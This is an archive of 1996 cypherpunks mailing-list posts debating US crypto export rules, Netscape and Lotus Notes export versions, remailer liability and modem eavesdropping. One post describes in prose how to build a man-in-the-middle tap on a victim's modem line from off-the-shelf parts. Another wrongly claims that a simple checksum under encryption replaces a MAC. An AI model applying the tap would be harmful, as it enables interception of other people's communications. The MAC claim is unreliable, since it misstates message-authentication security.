Subject: Re: Crippled Notes export encryption
Message-ID: <9601250304.AA13006@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>If you properly apply for a license to export the source code
>(explainig that the source code licensee might add the features
>that he feels are appropriate), is it still a conspiracy?

No it's not a conspiracy.  But they will not normally allow you to
export such source.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Thu, 25 Jan 1996 06:56:14 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <14925.9601242204@avon.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green <shamrock@netcom.com> writes:
> At 4:17 1/24/96, Timothy C. May wrote:
> 
> >The usual issue: That if a foreign-originated product even appears to be a
> >standard (so far, none have been), and includes strong crypto, then the NSA
> >and other agencies will simply change the rules. Thus, if extremely strong
> >crypto from "Netscape-Zurich" starts to have a significant market presense
> >in the U.S., then some law will be passed to restrict it.
> 
> I agree. The reason for enforcing ITAR is to keep good crypto of the
> *domestic* market. If ITAR no longer accomplishes that, new laws will be
> passed.

No need for any new laws or regulations, all that needs to be done is
to add crypto to the import list (the opposite, and currently not so
widely discussed counter part to the export list).

In fact I wouldn't be suprised if the ODTC and NSA could interpret
ITAR and the current import list to allow this.  (Anyone have an
electronic copy of the import restricted list?)

Of course this wouldn't be a very popular move, so I'd guess that it
wouldn't be tried until a) foreign crypto apps become a significant
obstacle to the NSA, and b) other methods have been exhausted.

Adam
--
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Thu, 25 Jan 1996 16:46:20 +0800
To: jya@pipeline.com
Subject: Re:  NSA advanced knowledge
Message-ID: <9601250609.AA28967@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


received from John Young <jya@pipeline.com>:
>
>Responding to msg by rsalz@osf.org (Rich Salz) on Wed, 24 Jan  
>7:34 PM
 
>>Is there any indication that the NSA knew about 
>>public-key before  it entered the open literature?
>
>
>   Fred B. Wrixon writes in "Codes and Ciphers," under the
>   "Public Key" entry:
>
>      ... This Hellman-Diffie proposal was apparently
>      anticipated by a similar version developed by the
>      National Security Agency (NSA) a decade earlier.
>      (p. 164)
>
>   No citation or elaboration is given for this claim.
>
>   Wrixon's book is a simply written compendium:
>
>      Codes and Ciphers: An A to Z of Covert Communication,
>      from the Clay Tablet to the Microdot.
>      Fred B. Wrixon
>      Prentice Hall, 1992. Paper $18.00
>      ISBN 0-13-277047-4
 
It was originally called FIREFLY or somesuch thing.  I may have some of
the early papers.  (The same ones leading to the statement in the book).
 
This should predate the STU-II to STU-III transition.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 25 Jan 1996 16:53:43 +0800
To: pete@loshin.com (Pete Loshin)
Subject: Re: Crippled Notes export encryption
In-Reply-To: <01BAEA7E.07613560@ploshin.tiac.net>
Message-ID: <199601250611.WAA08100@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> example, CyberCash has a development office there.
> 
	"has a development office" is a bit of an understatement.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf_Moeller@public.uni-hamburg.de (Ulf Moeller)
Date: Thu, 25 Jan 1996 13:44:21 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <3105FBFC.4DC9@netscape.com>
Message-ID: <m0tfCWG-00009WC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


>  I can see two practical ways to build a netscape product outside
>the US.  The first is to export the source code for the Navigator
>with the crypto code removed.  All of the calls to crypto would
>have to be removed as well.  I've heard some people claim that the
>government could come after us on the grounds that we were taking
>part in a conspiracy to export strong crypto.

If you properly apply for a license to export the source code
(explainig that the source code licensee might add the features
that he feels are appropriate), is it still a conspiracy?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 25 Jan 1996 15:58:26 +0800
To: cypherpunks@toad.com
Subject: Re: Why is blowfish so slow?  Other fast algorithms?
Message-ID: <199601250629.WAA16623@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:32 PM 1/23/96 -0500, David A Wagner wrote:

>If you want authentication, you must use a crypto-strength MAC.
>Encryption (be it RC4, DES, etc.) is not enough.

Not so:  If the message is encrypted and checksummed with a simple
not non cryptographic checksum, this gives you everything a MAC 
gives you, plus the message is secret.

MACs are only useful in the strange and unsual case where you want
authentification using a symmetric key, but you want to transmit in
the clear.  I cannot see any reason why anyone would ever wish to use
a MAC except perhaps to obey government bans on encrypted messages.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 25 Jan 1996 14:38:14 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Crippled Notes export encryption
Message-ID: <v02120d17ad2caa7efe0f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>  The problem is that the government refuses to publish the rules.
>They make people ask for approval for every piece of code that is
>exported.  This gives them lots of wiggle room so that they can keep
>changing the rules in the face of technical, legal, or political
>innovation.

In the legal trade, this is what's called an unpromulgated (secret) law.
It's a no-no in the philosophy of law, but a nation state can do whatever
it wants and still call it "legal". At least our esteemed congress doesn't
do retroactive legislation, like the 1KY reich did. Well, we only do tax
hikes that way, anyway.

We had a revolution to stop crap like in 1776, but we resurrected
unpromulgated laws with the advent of the ICC at the end of the last
century, and the IRS at the beginning of this one. It's encouraging to note
that the ICC has finally been "sunset". Too bad we can't do the same for
the IRS, and maybe even State Department. Maybe in some future world of
instant full-sensorium telepresence, encrypted, of course... ;-).

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Thu, 25 Jan 1996 14:33:22 +0800
To: jamesd@echeque.com (James A. Donald)
Subject: Re: Free speech and written rights.
In-Reply-To: <199601241624.IAA23975@mailx.best.com>
Message-ID: <199601250346.WAA00955@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


> James Donald said...
> In my judgement, America is reasonably free despite having a bill of rights,
> rather than because of a bill of rights.

This is a point that is difficult to get across to people, but is indeed
important and applicable to rampant law-passing today.

I explain to people that _before_ the Bill of Rights, the Constitution of
the United States placed the federal government in a very small box.
The rights of people were not discussed; this was a document to limit
government, not legislate rights.  The rights of people are preassumed.
The Bill of Rights "undid" this a little (lot) by putting the peoples'
rights into a box (maybe a somewhat roomy box, but a box none-the-less).

Thus we get ridiculous statements like, "The Constitution does not grant
you the right to..."  (Rights of people are preassumed ("endowed").)

We ought all be saying, "The Constitution does not grant federal gov't
the power to..."

The "Creator" grants rights; the Constitution limits federal government.

Another analogy draws on computer science (mathematics).

In computer science an "enumerated type" is much more restrictrive than
an unbounded data type.  Consider the Bill of Rights an attempt to enumerate
the rights of people.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 25 Jan 1996 16:47:38 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <v02120d03ad2cd03c9f28@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:01 1/24/96, Jeff Weinstein wrote:

>  I don't think that the TLAs are concerned about people at
>foreign universities using kerberos.  They are much more worried
>about mass market products.  If we did the same thing as was done
>for kerberos, then exported the code to a foreign subsidiary, I
>believe that the government would try to make a case against us
>that we had participated in a conspiracy to circumvent the
>export restrictions.

I think the only reason why the NSA has been getting away with this garbage
is because they convinced others that challenging the party line will
destroy you.

 I also think that they are bluffing. It is time that some party with
financial resources and public credibility makes a test case out of
themselves. An educational institution would be suited best.

Any takers?

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 27 Jan 1996 19:12:30 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: Crippled Notes export encryption
Message-ID: <v02120d07ad2cd42c8bfb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:34 1/24/96, Derek Atkins wrote:
>If I have a function that does something like this:
>
>authenticate (args)
>{
>        ...
>
>        des_encrypt ();
>        ...
>}
>
>I would have to remove the des_encrypt() call from the authenticate()
>routine before it can be exported...

What if you replaced it by rot_13 ()  ? Surely, they can't ban that. And
someone later could just swap all rot_13 () for des_encrypt ()


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 25 Jan 1996 16:54:59 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <v02120d08ad2cd535ca2f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:12 1/24/96, Michael Froomkin wrote:

>If you are a government strategist, you might think, Why not make people
>strictly liable for, e.g., any crimes planned with their remailers?  And
>make ISPs strictly liable for crimes panned or executed on their systems?

No doubt in my mind that will happen within the next few years. Remember
from past posts that remailers already are technically illegal in a few
states, though the legislators probably didn't think of remailers, when
they wrote the laws. A law making remailer operators responsible for their
traffic will pass by a margin customary for similar bills in the past
(>90%).

Remailers in the US and most of Western Europe will be outlawed or shut
down on their own once a few of their owners are held liable for some Four
Horsemen traffic flowing through. It is precisely because remailers, and by
extension future encrypted TCP redirectors, are a much greater danger to
the statist than 128 bit Netscape will ever be.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 25 Jan 1996 14:34:14 +0800
To: cypherpunks@toad.com
Subject: Several Edupage mentions
Message-ID: <01I0ELTY7MXGA0UN4F@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	The first is nice, given the vulnerability of international services
to pressure from one country. The second could be a problem. The third shows,
like the ITAR, that sometimes one government department can have a lot more
sense than the others. Possibly Commerce is benefiting from private sector
contacts?
	-Allen

From: Educom <educom@elanor.oit.unc.edu>

*****************************************************************
Edupage, 18 January 1996.  Edupage, a summary of news items on information
technology, is provided three times each week as a service by Educom,
a Washington, D.C.-based consortium of leading colleges and universities
seeking to transform education through the use of information technology.
*****************************************************************

EXODUS FROM COMMERCIAL SERVICES?
Commercial online services are having a difficult time keeping customers and
differentiating themselves, as more savvy computer users switch over to
small Internet access providers.  "Most everything I find on the online
services, I can find using an Internet service provider," says one customer
who's made the switch.  "For me, the need for an online service is
diminishing."  "AOL is like the Internet on training wheels," says another,
who feels he's "graduated."  In tandem with subscriber defection is the
problem of content providers who increasingly are setting up their own shops
on the Web, bypassing the commercial services altogether.  The popularity of
the Web "turns the model of the online services industry upside down," says
Scott Kurnit, the former No. 2 executive at Prodigy, who's now running an
Internet service for MCI and News Corp.  While the number of commercial
service subscribers has grown to about 12.5 million over the past decade
(doubling in the past year), the number of World Wide Web users increased
eight-fold, to eight-million, in just the past year, according to
International Data Corp.  (Wall Street Journal 18 Jan 96 A6)

ONE IS ENOUGH
The number of people subscribing to more than one online service has dropped
significantly since 1991 when almost a third of online users carried
multiple subscriptions.  Now, 97% report they can do everything they need to
using a single service.  (Business Week 22 Jan 96 p8)

[...]

CROSS-BORDER CULTURE WAR LOOMS
Canada's federal regulator is in Washington trying to persuade a skeptical
U.S. government that Canadian efforts to black out American TV signals that
contravene standards on violence and nudity do not violate NAFTA.  U.S.
Trade Representative Mickey Kantor has warned Canadian Trade Minister Roy
MacLaren that the U.S. government, while supporting the development of a
V-chip to allow parental control, will react negatively if Ottawa takes
wholesale action to block American programming from distribution through
Canadian cable systems.  (Toronto Financial Post 18 Jan 96 p5)  Meanwhile,
Power DirecTV says the explosive growth of satellite TV piracy and the flood
of American direct-to-home dishes into Canada is threatening to wipe out
Canadian broadcasting.  The company urged the Canadian government to create
rules that aid new Canadian DTH companies and to enforce laws that prohibit
the import of American dishes into Canada. (Toronto Star 17 Jan 96 B3)

[...]

***************************************************************

[...]

EDUPAGE is what you've just finished reading.  (Please note that it's
"Edupage" and not "EduPage.")  To subscribe to Edupage: send a message to:
listproc@educom.unc.edu and in the body of the message type: subscribe
edupage Jane Austen (assuming that your name is Jane Austen;  if it's not,
substitute your own name).  ...  To cancel, send a message to:
listproc@educom.unc.edu and in the body of the message type: unsubscribe
edupage.   (Subscription problems?  Send mail to educom@educom.unc.edu.)

[...]

ARCHIVES & TRANSLATIONS. For archive copies of Edupage or Update, ftp or
gopher to educom.edu or see URL: < http://www.educom.edu/>.   For the French
edition of Edupage, send mail to edupage-fr@ijs.com with the subject
"subscribe";  or see <  http://www.ijs.com  >.  For the German edition,
genugt eine E-Mail an:  infomat@stern.de mit der Betreff- oder Textzeile
"STERN Online Edupage".  For the Hebrew edition, send mail to
listserv@kinetica.co.il containing : SUBSCRIBE Leketnet-Word6 <name> or see
< http://www.kinetica.co.il/newsletters/leketnet/ >.  For the Hungarian
edition, send mail to:  send mail to subs.edupage@hungary.com.  For the
Italian edition :  < http://dbweb.agora.stm.it/webforum/infotech > or send
mail to: b.parrella@agora.stm.it. for info.   For the Portuguese edition,
contact edunews@nc-rj.rnp.br with the message SUB EDUPAGE-P Seu Primeiro
Nome Seu Sobrenome. For the Spanish edition, send mail edunews@nc-rj.rnp.br
with the message SUB EDUPAGE-E Su Primer Nombre, Su Apellido. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Thu, 25 Jan 1996 14:38:06 +0800
To: cypherpunks@toad.com
Subject: Export Regulations
Message-ID: <Pine.LNX.3.91.960124225413.15707A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


What if you encrypt the encrypted software and put it on a server, and 
then have the key to it printed out on paper... you take the key with you 
to another country and fetch the 'incomplete' software through the net. 
It only becomes useful data once you apply your legally obtained key.

I guess this would be the same as putting the software on a private ftp 
site though, where only you would know the password.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 25 Jan 1996 17:29:54 +0800
To: Andrew Loewenstern <dm@amsterdam.lcs.mit.edu>
Subject: Re: German home banking (fromn RISKS)
Message-ID: <m0tfLoa-000935C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:34 PM 1/24/96 -0600, Andrew Loewenstern wrote:
>>  Don't high speed modems transmit and receive on the same frequencies,
>>  using echo cancelation to decode the receive signals?  Does that
>>  make it impossible to eavesdrop on high-speed (i.e. V32bis) modems?
>
>No, and a lot of crackers and phone phreaks found out the hard way.  You can  
>buy protocol analysers off-the-shelf that will give a dump of the entire  
>communication by just passively listening in (or possibly playing back a  
>recording).

Assuming it were possible, it would have to have a rather good quality, 
although DAT should be adequate, I should think. 


>  I have seen units that could decode all of the popular Blue Book  
>protocols for consumer equipment such as faxes and high-speed modems as well  
>as ISDN, T1, DS3, ATM, 

Hey!  Justa sec!  ISDN is basically digital (broadband),  so (obviously) is 
T1, likewise DS3 and ATM.  Except for ISDN, unidirectional signals (at least 
at one time...), I think.  This is NOTHING compared to the difficulty of 
doing simultaneous bidirectional analysis in a 3 khz bandwidth of 28 kbps
each way!


Maybe you're far more familiar with what equipment is available for 
telephone analysis than I am, but I have serious doubts that the capacities 
you list above are even close to what the other guy asked about.
 

etc...  Most are programmable and some are full-blown  
>computers running stripped down versions of Unix and can also be controlled  
>over the network from RealComputers.  With multiple analysers and a little  
>custom software you could easily perform MITM attacks.  The hardest part is  
>getting in the middle.
>
>Modulation, comm-protocols, and compression techniques are not a replacement  
>for honest to goodness crypto.

Agreed, but let's not underestimate the amount of effort involved.  This is 
important, because of that "Digital Telephony" bill crapola they're trying 
to foist on us.  Their argument will be, we presume, that "we've gotta be 
able to bug all these lines because of all the drug dealers talking on the 
phone.  Well, unless the government is proposing installing the capability 
of bugging data the vast majority of data calls (including those that, 
hypothetically, use Clipper) then they're NOT going to get any traffic they 
claim to want to hear.  We should ask, "How much will it  cost to even 
UNDERSTAND a data phone call, let alone decrypt it, and if it's too high 
let's give up while we're behind."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Thu, 25 Jan 1996 14:53:48 +0800
To: dm@amsterdam.lcs.mit.edu (David Mazieres)
Subject: Re: German home banking (fromn RISKS)
In-Reply-To: <199601250030.TAA15203@amsterdam.lcs.mit.edu>
Message-ID: <9601250411.AA16294@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Was the person in the basement eavesdroping or actuall performing a
> man-in-the-middle attack?
> 
	Very much the easiest way of doing this is a classic man in the
middle attack with two vanilla off the shelf modems and a vanilla off
the shelf central office simulator.  The modems would be  tied more or
less back to back through two serial ports and software on a laptop in
the basement, one modem connected to the actual phone line to the central
office and the other connected to the local wires to the targets home
through the central office simulator.  This way all traffic in both
directions would go through the modems and software on the laptop
allowing the connection to be taken over cleanly between packets, and
packets to be injected and deleted as needed.  I beleive that it would
not be hard to make such a MITM decode the DTMF dialing from the target 
and dial the same number on its outgoing modem thus enabling the
MITM to passively relay modem calls it wasn't interested in spoofing.
And incoming modem calls could be similarly handled.

	While I might hasten to add that my interest is entirely
academic and I've never tried configuring such a thing, I'm quite sure
that standard off the shelf consumer modems and cheap and widely
available central office simulators could be configured to set up such a
MITM without requiring any special hardware, hardware modifications, or
modified modem firmware, or special programming expertise beyond that
required to operate modems through a serial port,  And obviously the
cost of such a thing might well be kept under $1000 and perhaps under
$500 compared to the multiple tens or hundreds  of thousands that the
specialized modem and protocol analyzer test equipment that can do this
sort of thing costs.

	A slightly more realistic version with a sound card and some
simple coupling transformers available at Radio Shack (or free from an
old junk modem) would allow full simulation/cutover of the call progress tones
and wrong number announcements and so forth and might make such a device
rather difficult to detect for a casual non technical modem user.
While this is not 100% off the shelf hardware, the technical skills required
are rather low.


> Don't high speed modems transmit and receive on the same frequencies,
> using echo cancelation to decode the receive signals?  Does that make
> it impossible to eavesdrop on high-speed (i.e. V32bis) modems?

	That has been widely reported.  In fact given a four wire
(directional) tap this is probably not true in many cases, in that
the inherent directionality (echo return loss) of the line gives enough
separation between the data going in one direction and the data going
in the other for successful separation.  This is further enhanced by
the generally true fact that the line is idle in at least one direction
for most of the time, and the pattern of date transmitted on an
idle line under LAPM is predictable  and can be subtracted out even if
the actual SNR is not good enough to reliably demodulate it.

	As far as I know, the firmware to allow passive monitoring of V.32 and
V.34 data is not part of any standard modem firmware, but many
modems can passively monitor the lower speed transmissions.

 
> 
> David
> 

							Dave Emery
							die@die.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 25 Jan 1996 14:40:16 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
In-Reply-To: <ad2bf34e04021004d2fa@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960124225704.5620D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Jan 1996, Timothy C. May wrote:
[...]
> 
> Specifically, I believe--though obviously cannot prove, given the nature of
> time--that a cryptographically strong version of Netscape developed outside
> the borders of the U.S. would not be freely importable into the U.S. I

Nope. Nope. Nope. Nope.  Donuts to dollars that it's freely importable.

Now, whether you could freely use it becomes another version of the 
"could they ban strong crypto for domestic use" issue.  I don't think 
so.  Why?  See my articles on my homepage, www.law.miami.edu/~froomkin

I also (to pick on Tim's excellent "you got to think like them" thread)
don't really see why they need to expend massive energies fighting this
battle once it looks lost (I do see why they would want to fight and have
fought delaying actions; every delay is a win in that mindset).  A
cryptographically strong browser isn't such a threat to policy, except
that you get more encrypted traffic messing up traffic analysis, and
that's happening gradually anyway.  Not to mention that traffic volumes
going up must strain some capacity somewhere. 

No, the real threats to LEAs/traditional ways of doing things are more
likely to be anonymity and anonymous cash.  And these are things that may
well be within the power of governments to at least make difficult if not
eliminate for some time.  "Chokepoints" is indeed the key word here, with
banks and remailer operators as chokees. 

If you are a government strategist, you might think, Why not make people
strictly liable for, e.g., any crimes planned with their remailers?  And
make ISPs strictly liable for crimes panned or executed on their systems? 

Those things stand more chance of being upheld than a ban on domestic use
of strong crypto, whether foreign or domestic coded.  I won't go so far as
to say "would be upheld" but it's much easier for me to imagine than a ban
on importing or using strong crypto.  I'm going to expand on this in the
next draft of my "oceans" paper; the draft currently on the web page does
not really do these issues much justice. 

> don't know what form such a law would take, to answer the point raised in
> another post by Peter Junger. Nor am I saying either State or NSA passes
> the laws...the ITARs have worked largely because they have never been
> challenged; if they were to be successfully challenged and stricken, as
> even some folks inside the NSA think is likely if tested in a proper case,
> then a Four Horseman-scared Congress will likely step in with some
> restrictions.
[...]

OK, Tim, what am I missing?  How will Enhanced-crypto-Netscape match 
remailers for their ability to keep TLAs up at night?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 25 Jan 1996 17:27:00 +0800
To: Alan Olsen <cypherpunks@toad.com
Subject: Re: Signing nyms' keys (Was: Report on Portland Cpunks...)
Message-ID: <m0tfLsC-00093jC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:49 PM 1/24/96 -0800, Alan Olsen wrote:

>Person X commits treasonable act A.  All of the persons who are signed on to
>his key could be considered to be co-conspirators.  The same applies to
>nyms.  The difficulty with prosecuting nyms is finding the link to the real
>world individual.  Anyone associated with him/her/it will be considered to
>be guilty by reason of key signage or a way of determining who the real
>person is...
>
>The only way I see getting around this is only signing nyms with nyms or
>having some sort of zero knowlege proof on a key signing authority.
>Something where you can issue some sort of proof to the signing authority
>that you are who you say you are without giving any information about your
>"real" identity.  I know of no foolproof way of doing this...
>
>I guess we are stuck with the "Web of Guilt"...

Doesn't all this stuff give you a headache <G>?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rickt@psisa.com (Rick Tait)
Date: Fri, 26 Jan 1996 05:09:28 +0800
To: cypherpunks@toad.com
Subject: Microsoft's CryptoAPI - thoughts?
Message-ID: <v01520d0200111847fc42@[153.37.173.54]>
MIME-Version: 1.0
Content-Type: text/plain


What does everyone think about this? Perhaps I already missed the boat, but
I just found out about it. How would international apps work? Would a data
file encrypted with an app compiled with a US-only CSP (cryptographic
service provider) be able to be loaded by a European equivalent app?

[Info can be found at: http://www.microsoft.com/intdev/inttech/cryptapi.htm]


--
rickt@psa.pencom.com
egalitarian, philosopher, unix cowboy, '68 chevy pickup hacker






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jan 1996 05:23:30 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <ad2c5790020210041172@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:12 AM 1/25/96, Michael Froomkin wrote:
>On Wed, 24 Jan 1996, Timothy C. May wrote:
>[...]
>>
>> Specifically, I believe--though obviously cannot prove, given the nature of
>> time--that a cryptographically strong version of Netscape developed outside
>> the borders of the U.S. would not be freely importable into the U.S. I
>
>Nope. Nope. Nope. Nope.  Donuts to dollars that it's freely importable.

First of all let me say that I take no offense at Michael's "Nope. Nope.
Nope. Nope." opening. This is the kind of interesting debate we need to
have!

But let me address a specific question first:


>> don't know what form such a law would take, to answer the point raised in
>> another post by Peter Junger. Nor am I saying either State or NSA passes
>> the laws...the ITARs have worked largely because they have never been
>> challenged; if they were to be successfully challenged and stricken, as
>> even some folks inside the NSA think is likely if tested in a proper case,
>> then a Four Horseman-scared Congress will likely step in with some
>> restrictions.
>[...]
>
>OK, Tim, what am I missing?  How will Enhanced-crypto-Netscape match
>remailers for their ability to keep TLAs up at night?

Once one has good encrypted links, including access to a variety of
offshore sites,  remailers cannot be stopped. The TLAs may not like them,
and the courts may rule that a remailer site is strictly liable for
misdeeds which impinge on its remailers (I'm not convinced this is so, but
no matter), but what do U.S. courts have to say about Dutch remailer sites?
What will the Fifth Circuit be able to do to hactic.nl? Or chains of
remailers that pass through Norway, Japan, Estonia, Italy, and Lower
Slobovia?

We've already got that with PGP, of course, so it's to some extent moot.

All of the mentions recently about strong crypto built into Netscape,
Mosaic, AOL, etc., have to do with the _popularity_ and _ease of use_
issues, not the existence proof. That is, having strong crypto built in to
Netscape will not give us a capability we don't already have, just give it
to more people and more conveniently.

Back to the issue of remailers and anonymous servers as choke points. I
agree. These are the real threats to traffic analysis, which is of course
why I have so emphasized them in my own writings for so many years!!

I take it as a given that no remailer services will operate for profit,
publically, and with support built in to Netscape, at least not openly and
identifiably within the U.S....it is too controversial. (I don't mean that
most of the remailers are not U.S., now, I mean after the heat gets turned
up, after the next "Oklahoma City bomber" is found to have been
communicating with remailers! An awful lot of remailer sites will vanish
overnight. In act, evidence that remailers are being used may be
manufactured.)

Fortunately, and I keep coming back to this, the beauty of PGP is that the
encryption is in the text blocks within mailers, browsers, etc., and little
or no hooks to external programs are needed. (We often moan about this, and
wish for PGP 3.0 or 4.0 to have all kinds of hooks, but there is a certain
elegance about a text-block-centric program, with hooks made later on an ad
hoc basis....it is so terribly difficult to control what's in a text block
that suppression of PGP is very hard.)

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 25 Jan 1996 17:51:27 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Crippled Notes export encryption
Message-ID: <v02120d09ad2cda2bf48f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:07 1/24/96, Peter D. Junger wrote:

>The ITAR are regulations, not a law passed by
>Congress.  The ITAR regulations relating to the export of cryptography
>are probably not authorized by any law (as well as being
>unconstitutional).  The reason for all the silly twists and turns
>under the ITAR is that the censors never succeeded in getting any law
>forbidding the use of cryptography, and it is not at all certain that
>they could get such a law passed.

They couldn't get a law passed _then_. Nor did they need to. They also
don't need one now, because they have rubber regulations at their disposal.
They will be able to get a law passed, should their interpretation of the
regulations be thrown out by a court. Passing such a law will be *trivial*.
Just put in the exceptions for the powerful special interest groups, such
as banks. The vote will be near unanimous, as it always is in similar
cases. See Digital Telephony.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 27 Jan 1996 09:38:08 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <v02120d0aad2cdbd3581c@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:49 1/24/96, Alex Strasheim wrote:

>Big companies like Netscape, Sun, Microsoft, and IBM/Lotus, on the other
>hand, will almost certainly achieve their objectives if they win the
>political fight.  They'll make buckets of money selling crypto software
>abroad.  And if they lose the fight, they're going to be handing big
>opportunities to foreign competitors.

The big companies are fighting? Where did you get that idea? IBM/Lotus just
gave the feds the keys. Not a single one of the major players has
challenged the government in any meaningful way. Sure, they make a lot of
noise as to how they dislike the regulations, but they certainly aren't
making a sincere effort of trying to change them.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 25 Jan 1996 17:44:07 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <v02120d0bad2cdd10a2c8@[192.0.2.1]>
MIME-Version: 1.0
